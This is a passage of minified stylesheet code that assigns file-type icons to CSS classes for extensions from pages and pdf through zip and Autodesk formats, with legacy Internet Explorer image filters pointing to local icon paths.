\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');}.x-pdb{background-image:url("../../../images/file_icon/icon_file/pdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');}.x-pdf{background-image:url("../../../images/file_icon/icon_file/pdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');}.x-php{background-image:url("../../../images/file_icon/icon_file/php.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');}.x-pkg{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-pl{background-image:url("../../../images/file_icon/icon_file/pl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');}.x-png{background-image:url("../../../images/file_icon/icon_file/png.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');}.x-pps{background-image:url("../../../images/file_icon/icon_file/pps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');}.x-ppsx{background-image:url("../../../images/file_icon/icon_file/ppsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');}.x-ppt{background-image:url("../../../images/file_icon/icon_file/ppt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');}.x-pptx{background-image:url("../../../images/file_icon/icon_file/pptx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');}.x-pot{background-image:url("../../../images/file_icon/icon_file/pot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');}.x-potx,.x-ppam{background-image:url("../../../images/file_icon/icon_file/potx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');}.x-prproj{background-image:url("../../../images/file_icon/icon_file/prproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');}.x-ps1{background-image:url("../../../images/file_icon/icon_file/ps1.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');}.x-psd{background-image:url("../../../images/file_icon/icon_file/psd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');}.x-pspimage{background-image:url("../../../images/file_icon/icon_file/pspimage.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');}.x-pst{background-image:url("../../../images/file_icon/icon_file/pst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');}.x-pub{background-image:url("../../../images/file_icon/icon_file/pub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');}.x-py{background-image:url("../../../images/file_icon/icon_file/py.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');}.x-rar{background-image:url("../../../images/file_icon/icon_file/rar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');}.x-rb{background-image:url("../../../images/file_icon/icon_file/rb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');}.x-reg{background-image:url("../../../images/file_icon/icon_file/reg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');}.x-resx{background-image:url("../../../images/file_icon/icon_file/resx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');}.x-rtf{background-image:url("../../../images/file_icon/icon_file/rtf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');}.x-sitx{background-image:url("../../../images/file_icon/icon_file/sitx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');}.x-sln{background-image:url("../../../images/file_icon/icon_file/sln.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');}.x-sql{background-image:url("../../../images/file_icon/icon_file/sql.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');}.x-suo{background-image:url("../../../images/file_icon/icon_file/suo.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');}.x-svg{background-image:url("../../../images/file_icon/icon_file/svg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');}.x-swf{background-image:url("../../../images/file_icon/icon_file/swf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');}.x-tar{background-image:url("../../../images/file_icon/icon_file/tar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');}.x-tga{background-image:url("../../../images/file_icon/icon_file/tga.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');}.x-tgz{background-image:url("../../../images/file_icon/icon_file/tgz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');}.x-txt{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-vb{background-image:url("../../../images/file_icon/icon_file/vb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');}.x-vbproj{background-image:url("../../../images/file_icon/icon_file/vbproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');}.x-vbs{background-image:url("../../../images/file_icon/icon_file/vbs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');}.x-vcf{background-image:url("../../../images/file_icon/icon_file/vcf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');}.x-vcproj{background-image:url("../../../images/file_icon/icon_file/vcproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');}.x-vcxproj{background-image:url("../../../images/file_icon/icon_file/vcxproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');}.x-vdw{background-image:url("../../../images/file_icon/icon_file/vdw.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');}.x-vdx{background-image:url("../../../images/file_icon/icon_file/vdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');}.x-vsd{background-image:url("../../../images/file_icon/icon_file/vsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');}.x-vsdx{background-image:url("../../../images/file_icon/icon_file/vsdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');}.x-vss{background-image:url("../../../images/file_icon/icon_file/vss.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');}.x-vst{background-image:url("../../../images/file_icon/icon_file/vst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');}.x-vsx{background-image:url("../../../images/file_icon/icon_file/vsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');}.x-vtx{background-image:url("../../../images/file_icon/icon_file/vtx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');}.x-xaml{background-image:url("../../../images/file_icon/icon_file/xaml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');}.x-xap{background-image:url("../../../images/file_icon/icon_file/xap.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');}.x-xls{background-image:url("../../../images/file_icon/icon_file/xls.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');}.x-xlsb{background-image:url("../../../images/file_icon/icon_file/xlsb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');}.x-xlsm{background-image:url("../../../images/file_icon/icon_file/xlsm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');}.x-xlsx{background-image:url("../../../images/file_icon/icon_file/xlsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');}.x-xlt{background-image:url("../../../images/file_icon/icon_file/xlt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');}.x-xltx{background-image:url("../../../images/file_icon/icon_file/xltx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');}.x-xml{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-xps{background-image:url("../../../images/file_icon/icon_file/xps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');}.x-xsd{background-image:url("../../../images/file_icon/icon_file/xsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');}.x-xsl{background-image:url("../../../images/file_icon/icon_file/xsl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');}.x-y{background-image:url("../../../images/file_icon/icon_file/y.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');}.x-zip{background-image:url("../../../images/file_icon/icon_file/zip.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');}.x-3dm,.x-3ds,.x-asm,.x-cam360,.x-catpart,.x-catproduct,.x-cgr,.x-collaboration,.x-dae,.x-dgn,.x-dlv3,.x-dwf,.x-dwfx,.x-dwg,.x-dwt,.x-dxf,.x-exp,.x-f3d,.x-fbx,.x-g,.x-gbxml,.x-iam,.x-idw,.x-ifc,.x-ige,.x-iges,.x-igs,.x-ipt,.x-jt,.x-model,.x-neu,.x-nwc,.x-nwd,.x-obj,.x-prt,.x-rvt,.x-sab,.x-sat,.x-session,.x-skp,.x-sldasm,.x-sldprt,.x-smb,.x-smt,.x-ste,.x-step,.x-stl,.x-stla,.x-stlb,.x-stp,.x-wire,.x-x_b,.x-x_t,.x-xas,.x-xpr{background-image:url("../../../images/file_icon/icon_file/autodesk/autodesk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');}.x-3ds{background-image:url("../../../images/file_icon/icon_file/autodesk/3ds.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');}.x-3dm{background-image:url("../../../images/file_icon/icon_file/autodesk/3dm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');}.x-dae{background-image:url("../../../images/file_icon/icon_file/autodesk/dae.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');}.x-stl,.x-stla,.x-stlb{background-image:url("../../../images/file_icon/icon_file/autodesk/stl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');}.x-dwg{background-image:url("../../../images/file_icon/icon_file/autodesk/dwg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');}.x-dwf{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dwfx{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dxf{background-image:url("../../../images/file_icon/icon_file/autodesk/dxf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');}.x-ifc{background-image:url("../../../images/file_icon/icon_file/autodesk/ifc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');}.x-iam{background-image:url("../../../images/file_icon/icon_file/autodesk/iam.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');}.x-fbx{background-image:url("../../../images/file_icon/icon_file/autodesk/fbx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');}.x-rvt{background-image:url("../../../images/file_icon/icon_file/autodesk/rvt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');}.x-skp{background-image:url("../../../images/file_icon/icon_file/autodesk/skp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');}.x-vnd,.x-dgn{background-image:url("../../../images/file_icon/icon_file/autodesk/vnd-dgn.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');}.x-folder{background-image:url("../../../images/file_icon/icon_others/folder.png");background-image:none 